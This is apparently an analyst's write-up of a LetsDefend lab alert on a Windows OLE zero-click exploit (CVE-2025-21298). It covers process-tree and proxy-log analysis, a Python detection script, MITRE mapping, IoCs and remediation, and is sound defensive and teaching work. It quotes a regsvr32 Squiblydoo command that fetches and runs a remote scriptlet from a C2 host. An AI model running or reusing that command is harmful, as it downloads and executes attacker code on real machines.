SOC336 - Windows OLE Zero-Click RCE Exploitation Detected (CVE-2025-21298)

16/05/2026 — CRITICAL — LetsDefend SOC - Endpoint & Proxy Logs (172.16.17.137)

True Positive | #cve-2025-21298 #windows-ole #zero-click #rce #regsvr32 #phishing #c2

Detection and investigation of a confirmed Windows OLE zero-click RCE exploitation via a malicious RTF email. OUTLOOK.EXE spawned cmd.exe which executed regsvr32.exe to retrieve a remote payload from a C2 server. The proxy permitted the outbound request. Host was isolated and escalated to L2.

Case and process

Case ID: SOC336
Analyst: Alain Tran (L1)
Reviewer: TBD (L2)
Escalated to: Yes — escalated to L2 for forensic investigation after host isolation.

Severity rationale

Critical: confirmed zero-click RCE exploitation of CVE-2025-21298 (CVSS 9.8). A malicious RTF email triggered OUTLOOK.EXE to spawn cmd.exe, which executed regsvr32.exe to silently retrieve and run a remote scriptlet (shell.sct) from C2 server 84.38.130.118. The proxy permitted the outbound GET request. Payload was successfully retrieved. No AV/EDR quarantine occurred. Full execution chain confirmed via process tree and proxy logs.

Remediation

  • Isolated host 172.16.17.137 via EDR immediately after C2 connection confirmed. Done
  • Blocked C2 IP 84.38.130.118 at proxy level. Done
  • Submitted IoCs (IP, URL, file) to Threat Intel team. Done
  • Apply Microsoft January 2025 patch for CVE-2025-21298 across all endpoints. Pending
  • Create SIEM detection rule alerting on OUTLOOK.EXE spawning cmd.exe or powershell.exe. Pending
  • Block regsvr32.exe outbound connections via Attack Surface Reduction (ASR) rules. Pending
  • Disable automatic RTF preview in Outlook via Group Policy. Pending

Overview

On February 4, 2025, at 08:06 AM, a SOC alert was triggered for a suspected exploitation of CVE-2025-21298, a critical zero-click Remote Code Execution vulnerability in the Windows OLE component (CVSS 9.8).

The vulnerability allows an attacker to achieve code execution simply by sending a malicious RTF email — the victim does not need to open an attachment. Outlook’s automatic preview is enough to trigger the exploit.

Investigation Steps

1. Initial triage

The alert identified OUTLOOK.EXE as the parent process of a suspicious execution chain on host 172.16.17.137. The binary path was confirmed legitimate:

C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE

2. Process tree analysis

OUTLOOK.EXE spawned cmd.exe with the following command:

cmd.exe /c regsvr32.exe /s /u /i:http://84.38.130.118.com/shell.sct scrobj.dll

This is a known Squiblydoo / Living-off-the-Land technique (MITRE T1218.010). regsvr32.exe is a legitimate Windows binary abused here to download and execute a remote COM scriptlet (.sct) without writing to disk initially, bypassing many AV solutions.

3. Network log analysis

Proxy logs confirmed the outbound connection:

Field | Value
Source | 172.16.17.137:35424
Destination | 84.38.130.118:80
Method | GET
URL | http://84.38.130.118.com/shell.sct
Proxy action | Permitted
Process | cmd.exe (PID 6784)
Timestamp | Feb 04, 2025, 08:06 AM

The proxy did not block the request. The payload shell.sct was successfully retrieved from the C2 server.
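The process-tree pattern from step 2 and the proxy correlation from step 3 can be expressed as detection logic. The following is an added example written for this write-up, not part of the original case or of LetsDefend's tooling; it assumes Sysmon-style process-creation fields (pid, image, parent_image, cmdline) and a space-separated proxy line format, and all sample events are constructed (only the command line, host and C2 values come from the case).

```python
import re
# Constructed sample process-creation events (Sysmon Event ID 1 style); not the case's raw logs.
PROCESS_EVENTS = [
    {"pid": 6784, "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "cmdline": "cmd.exe /c regsvr32.exe /s /u /i:http://84.38.130.118.com/shell.sct scrobj.dll"},
    {"pid": 7000, "image": r"C:\Windows\System32\cmd.exe",  # benign: shell from explorer
     "parent_image": r"C:\Windows\explorer.exe", "cmdline": "cmd.exe /c dir"},
    {"pid": 7100, "image": r"C:\Windows\System32\regsvr32.exe",  # benign: local DLL registration
     "parent_image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"regsvr32.exe /s C:\Program Files\Vendor\comp.dll"},
]
# Constructed proxy lines (assumed format): src dst method url action process pid
PROXY_LINES = [
    "172.16.17.137:35424 84.38.130.118:80 GET http://84.38.130.118.com/shell.sct Permitted cmd.exe 6784",
    "172.16.17.137:35430 52.96.0.1:443 GET https://outlook.office.com/ Permitted OUTLOOK.EXE 5120",
]

OFFICE_PARENTS = {"outlook.exe", "winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# regsvr32 /i:<url> ... scrobj.dll is the Squiblydoo pattern (T1218.010); a local /s register is not.
SQUIBLYDOO = re.compile(r"regsvr32(?:\.exe)?\s.*?/i:\s*(https?://\S+).*?scrobj\.dll", re.I)

def basename(path): return path.rsplit("\\", 1)[-1].lower()

def detect_process_events(events):
    """Return (pid, rule, detail) for each process event matching a rule."""
    hits = []
    for e in events:
        parent, child = basename(e["parent_image"]), basename(e["image"])
        if parent in OFFICE_PARENTS and child in SHELLS:  # Office app spawning a shell
            hits.append((e["pid"], "office_spawns_shell", f"{parent} -> {child}"))
        m = SQUIBLYDOO.search(e["cmdline"])
        if m:  # remote scriptlet fetched via regsvr32
            hits.append((e["pid"], "regsvr32_remote_scriptlet", m.group(1)))
    return hits

def correlate_proxy(hits, proxy_lines):
    """Join proxy requests to PIDs already flagged from process telemetry."""
    flagged = {pid for pid, _, _ in hits}
    out = []
    for line in proxy_lines:
        src, dst, method, url, action, proc, pid = line.split()
        if int(pid) in flagged:
            out.append({"pid": int(pid), "dst": dst, "url": url, "action": action})
    return out

if __name__ == "__main__":
    hits = detect_process_events(PROCESS_EVENTS)
    print(hits, correlate_proxy(hits, PROXY_LINES))
```

Against the constructed input only PID 6784 fires both rules, and its proxy request to 84.38.130.118:80 is returned as the correlated C2 retrieval while the benign cmd.exe and regsvr32.exe events stay quiet.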

4. Quarantine check

Neither the antivirus nor the EDR automatically quarantined the malware. The payload executed without being intercepted.

Malware quarantined: No

5. Verdict

True Positive — Exploitation confirmed. The full execution chain from email delivery to C2 payload retrieval was validated via process tree and proxy logs.

MITRE ATT&CK Mapping

Technique ID | Name
T1566.001 | Phishing — Spearphishing Attachment
T1218.010 | System Binary Proxy Execution — Regsvr32
T1071.001 | Application Layer Protocol — Web Protocols (C2 over HTTP)

Indicators of Compromise (IoCs)

Type | Value
C2 IP | 84.38.130.118
Payload URL | http://84.38.130.118.com/shell.sct
Payload file | shell.sct
Abused binary | regsvr32.exe
Affected host | 172.16.17.137
Affected process | OUTLOOK.EXE → cmd.exe (PID 6784)

Key Takeaways